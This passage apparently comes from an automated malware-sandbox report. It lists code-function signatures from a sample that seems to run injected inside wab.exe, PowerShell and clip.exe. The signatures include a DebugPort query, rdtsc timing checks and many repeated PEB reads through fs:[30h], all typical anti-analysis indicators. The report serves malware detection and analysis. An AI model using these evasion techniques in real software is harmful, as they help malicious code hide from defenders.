          Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B096E rdtsc 10_2_213B096E
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_03FBD7B8 LdrInitializeThunk,6_2_03FBD7B8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21404144 mov eax, dword ptr fs:[00000030h]10_2_21404144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21404144 mov eax, dword ptr fs:[00000030h]10_2_21404144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21404144 mov ecx, dword ptr fs:[00000030h]10_2_21404144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21404144 mov eax, dword ptr fs:[00000030h]10_2_21404144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21404144 mov eax, dword ptr fs:[00000030h]10_2_21404144
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21408158 mov eax, dword ptr fs:[00000030h]10_2_21408158
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A0124 mov eax, dword ptr fs:[00000030h]10_2_213A0124
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21430115 mov eax, dword ptr fs:[00000030h]10_2_21430115
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141A118 mov ecx, dword ptr fs:[00000030h]10_2_2141A118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141A118 mov eax, dword ptr fs:[00000030h]10_2_2141A118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141A118 mov eax, dword ptr fs:[00000030h]10_2_2141A118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141A118 mov eax, dword ptr fs:[00000030h]10_2_2141A118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136C156 mov eax, dword ptr fs:[00000030h]10_2_2136C156
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376154 mov eax, dword ptr fs:[00000030h]10_2_21376154
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376154 mov eax, dword ptr fs:[00000030h]10_2_21376154
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214361C3 mov eax, dword ptr fs:[00000030h]10_2_214361C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214361C3 mov eax, dword ptr fs:[00000030h]10_2_214361C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F019F mov eax, dword ptr fs:[00000030h]10_2_213F019F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F019F mov eax, dword ptr fs:[00000030h]10_2_213F019F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F019F mov eax, dword ptr fs:[00000030h]10_2_213F019F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F019F mov eax, dword ptr fs:[00000030h]10_2_213F019F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136A197 mov eax, dword ptr fs:[00000030h]10_2_2136A197
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136A197 mov eax, dword ptr fs:[00000030h]10_2_2136A197
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136A197 mov eax, dword ptr fs:[00000030h]10_2_2136A197
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214461E5 mov eax, dword ptr fs:[00000030h]10_2_214461E5
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B0185 mov eax, dword ptr fs:[00000030h]10_2_213B0185
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21414180 mov eax, dword ptr fs:[00000030h]10_2_21414180
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21414180 mov eax, dword ptr fs:[00000030h]10_2_21414180
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A01F8 mov eax, dword ptr fs:[00000030h]10_2_213A01F8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2142C188 mov eax, dword ptr fs:[00000030h]10_2_2142C188
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2142C188 mov eax, dword ptr fs:[00000030h]10_2_2142C188
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE1D0 mov eax, dword ptr fs:[00000030h]10_2_213EE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE1D0 mov eax, dword ptr fs:[00000030h]10_2_213EE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE1D0 mov ecx, dword ptr fs:[00000030h]10_2_213EE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE1D0 mov eax, dword ptr fs:[00000030h]10_2_213EE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213EE1D0 mov eax, dword ptr fs:[00000030h]10_2_213EE1D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136A020 mov eax, dword ptr fs:[00000030h]10_2_2136A020
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136C020 mov eax, dword ptr fs:[00000030h]10_2_2136C020
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138E016 mov eax, dword ptr fs:[00000030h]10_2_2138E016
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138E016 mov eax, dword ptr fs:[00000030h]10_2_2138E016
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138E016 mov eax, dword ptr fs:[00000030h]10_2_2138E016
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138E016 mov eax, dword ptr fs:[00000030h]10_2_2138E016
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F4000 mov ecx, dword ptr fs:[00000030h]10_2_213F4000
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]10_2_21412000
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]10_2_21412000
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]10_2_21412000
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]10_2_21412000
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]10_2_21412000
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]10_2_21412000
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]10_2_21412000
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21412000 mov eax, dword ptr fs:[00000030h]10_2_21412000
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139C073 mov eax, dword ptr fs:[00000030h]10_2_2139C073
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21372050 mov eax, dword ptr fs:[00000030h]10_2_21372050
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F6050 mov eax, dword ptr fs:[00000030h]10_2_213F6050
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21406030 mov eax, dword ptr fs:[00000030h]10_2_21406030
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137208A mov eax, dword ptr fs:[00000030h]10_2_2137208A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136C0F0 mov eax, dword ptr fs:[00000030h]10_2_2136C0F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B20F0 mov ecx, dword ptr fs:[00000030h]10_2_213B20F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136A0E3 mov ecx, dword ptr fs:[00000030h]10_2_2136A0E3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213780E9 mov eax, dword ptr fs:[00000030h]10_2_213780E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F60E0 mov eax, dword ptr fs:[00000030h]10_2_213F60E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F20DE mov eax, dword ptr fs:[00000030h]10_2_213F20DE
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214080A8 mov eax, dword ptr fs:[00000030h]10_2_214080A8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214360B8 mov eax, dword ptr fs:[00000030h]10_2_214360B8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214360B8 mov ecx, dword ptr fs:[00000030h]10_2_214360B8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2143A352 mov eax, dword ptr fs:[00000030h]10_2_2143A352
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21418350 mov ecx, dword ptr fs:[00000030h]10_2_21418350
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136C310 mov ecx, dword ptr fs:[00000030h]10_2_2136C310
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21390310 mov ecx, dword ptr fs:[00000030h]10_2_21390310
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA30B mov eax, dword ptr fs:[00000030h]10_2_213AA30B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA30B mov eax, dword ptr fs:[00000030h]10_2_213AA30B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AA30B mov eax, dword ptr fs:[00000030h]10_2_213AA30B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2141437C mov eax, dword ptr fs:[00000030h]10_2_2141437C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F035C mov eax, dword ptr fs:[00000030h]10_2_213F035C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F035C mov eax, dword ptr fs:[00000030h]10_2_213F035C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F035C mov eax, dword ptr fs:[00000030h]10_2_213F035C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F035C mov ecx, dword ptr fs:[00000030h]10_2_213F035C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F035C mov eax, dword ptr fs:[00000030h]10_2_213F035C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F035C mov eax, dword ptr fs:[00000030h]10_2_213F035C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F2349 mov eax, dword ptr fs:[00000030h]10_2_213F2349
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2142C3CD mov eax, dword ptr fs:[00000030h]10_2_2142C3CD
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214143D4 mov eax, dword ptr fs:[00000030h]10_2_214143D4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214143D4 mov eax, dword ptr fs:[00000030h]10_2_214143D4
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21368397 mov eax, dword ptr fs:[00000030h]10_2_21368397
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21368397 mov eax, dword ptr fs:[00000030h]10_2_21368397
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21368397 mov eax, dword ptr fs:[00000030h]10_2_21368397
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139438F mov eax, dword ptr fs:[00000030h]10_2_2139438F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139438F mov eax, dword ptr fs:[00000030h]10_2_2139438F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136E388 mov eax, dword ptr fs:[00000030h]10_2_2136E388
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136E388 mov eax, dword ptr fs:[00000030h]10_2_2136E388
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136E388 mov eax, dword ptr fs:[00000030h]10_2_2136E388
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A63FF mov eax, dword ptr fs:[00000030h]10_2_213A63FF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138E3F0 mov eax, dword ptr fs:[00000030h]10_2_2138E3F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138E3F0 mov eax, dword ptr fs:[00000030h]10_2_2138E3F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2138E3F0 mov eax, dword ptr fs:[00000030h]10_2_2138E3F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]10_2_213803E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]10_2_213803E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]10_2_213803E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]10_2_213803E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]10_2_213803E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]10_2_213803E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]10_2_213803E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213803E9 mov eax, dword ptr fs:[00000030h]10_2_213803E9
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A3C0 mov eax, dword ptr fs:[00000030h]10_2_2137A3C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A3C0 mov eax, dword ptr fs:[00000030h]10_2_2137A3C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A3C0 mov eax, dword ptr fs:[00000030h]10_2_2137A3C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A3C0 mov eax, dword ptr fs:[00000030h]10_2_2137A3C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A3C0 mov eax, dword ptr fs:[00000030h]10_2_2137A3C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A3C0 mov eax, dword ptr fs:[00000030h]10_2_2137A3C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213783C0 mov eax, dword ptr fs:[00000030h]10_2_213783C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213783C0 mov eax, dword ptr fs:[00000030h]10_2_213783C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213783C0 mov eax, dword ptr fs:[00000030h]10_2_213783C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213783C0 mov eax, dword ptr fs:[00000030h]10_2_213783C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F63C0 mov eax, dword ptr fs:[00000030h]10_2_213F63C0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136823B mov eax, dword ptr fs:[00000030h]10_2_2136823B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]10_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]10_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]10_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]10_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]10_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]10_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]10_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]10_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]10_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]10_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]10_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21420274 mov eax, dword ptr fs:[00000030h]10_2_21420274
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21374260 mov eax, dword ptr fs:[00000030h]10_2_21374260
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21374260 mov eax, dword ptr fs:[00000030h]10_2_21374260
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21374260 mov eax, dword ptr fs:[00000030h]10_2_21374260
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136826B mov eax, dword ptr fs:[00000030h]10_2_2136826B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2136A250 mov eax, dword ptr fs:[00000030h]10_2_2136A250
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21376259 mov eax, dword ptr fs:[00000030h]10_2_21376259
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F8243 mov eax, dword ptr fs:[00000030h]10_2_213F8243
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F8243 mov ecx, dword ptr fs:[00000030h]10_2_213F8243
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213802A0 mov eax, dword ptr fs:[00000030h]10_2_213802A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213802A0 mov eax, dword ptr fs:[00000030h]10_2_213802A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F0283 mov eax, dword ptr fs:[00000030h]10_2_213F0283
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F0283 mov eax, dword ptr fs:[00000030h]10_2_213F0283
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F0283 mov eax, dword ptr fs:[00000030h]10_2_213F0283
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE284 mov eax, dword ptr fs:[00000030h]10_2_213AE284
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE284 mov eax, dword ptr fs:[00000030h]10_2_213AE284
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213802E1 mov eax, dword ptr fs:[00000030h]10_2_213802E1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213802E1 mov eax, dword ptr fs:[00000030h]10_2_213802E1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213802E1 mov eax, dword ptr fs:[00000030h]10_2_213802E1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214062A0 mov eax, dword ptr fs:[00000030h]10_2_214062A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214062A0 mov ecx, dword ptr fs:[00000030h]10_2_214062A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214062A0 mov eax, dword ptr fs:[00000030h]10_2_214062A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214062A0 mov eax, dword ptr fs:[00000030h]10_2_214062A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214062A0 mov eax, dword ptr fs:[00000030h]10_2_214062A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_214062A0 mov eax, dword ptr fs:[00000030h]10_2_214062A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A2C3 mov eax, dword ptr fs:[00000030h]10_2_2137A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A2C3 mov eax, dword ptr fs:[00000030h]10_2_2137A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A2C3 mov eax, dword ptr fs:[00000030h]10_2_2137A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A2C3 mov eax, dword ptr fs:[00000030h]10_2_2137A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2137A2C3 mov eax, dword ptr fs:[00000030h]10_2_2137A2C3
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E53E mov eax, dword ptr fs:[00000030h]10_2_2139E53E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E53E mov eax, dword ptr fs:[00000030h]10_2_2139E53E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E53E mov eax, dword ptr fs:[00000030h]10_2_2139E53E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E53E mov eax, dword ptr fs:[00000030h]10_2_2139E53E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E53E mov eax, dword ptr fs:[00000030h]10_2_2139E53E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380535 mov eax, dword ptr fs:[00000030h]10_2_21380535
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380535 mov eax, dword ptr fs:[00000030h]10_2_21380535
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380535 mov eax, dword ptr fs:[00000030h]10_2_21380535
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380535 mov eax, dword ptr fs:[00000030h]10_2_21380535
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380535 mov eax, dword ptr fs:[00000030h]10_2_21380535
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21380535 mov eax, dword ptr fs:[00000030h]10_2_21380535
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21406500 mov eax, dword ptr fs:[00000030h]10_2_21406500
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]10_2_21444500
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]10_2_21444500
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]10_2_21444500
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]10_2_21444500
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]10_2_21444500
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]10_2_21444500
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21444500 mov eax, dword ptr fs:[00000030h]10_2_21444500
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A656A mov eax, dword ptr fs:[00000030h]10_2_213A656A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A656A mov eax, dword ptr fs:[00000030h]10_2_213A656A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A656A mov eax, dword ptr fs:[00000030h]10_2_213A656A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378550 mov eax, dword ptr fs:[00000030h]10_2_21378550
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21378550 mov eax, dword ptr fs:[00000030h]10_2_21378550
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213945B1 mov eax, dword ptr fs:[00000030h]10_2_213945B1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213945B1 mov eax, dword ptr fs:[00000030h]10_2_213945B1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F05A7 mov eax, dword ptr fs:[00000030h]10_2_213F05A7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F05A7 mov eax, dword ptr fs:[00000030h]10_2_213F05A7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213F05A7 mov eax, dword ptr fs:[00000030h]10_2_213F05A7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AE59C mov eax, dword ptr fs:[00000030h]10_2_213AE59C
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213A4588 mov eax, dword ptr fs:[00000030h]10_2_213A4588
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21372582 mov eax, dword ptr fs:[00000030h]10_2_21372582
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_21372582 mov ecx, dword ptr fs:[00000030h]10_2_21372582
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213725E0 mov eax, dword ptr fs:[00000030h]10_2_213725E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC5ED mov eax, dword ptr fs:[00000030h]10_2_213AC5ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213AC5ED mov eax, dword ptr fs:[00000030h]10_2_213AC5ED
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]10_2_2139E5E7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]10_2_2139E5E7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]10_2_2139E5E7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]10_2_2139E5E7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2139E5E7 mov eax, dword ptr fs:[00000030h]10_2_2139E5E7
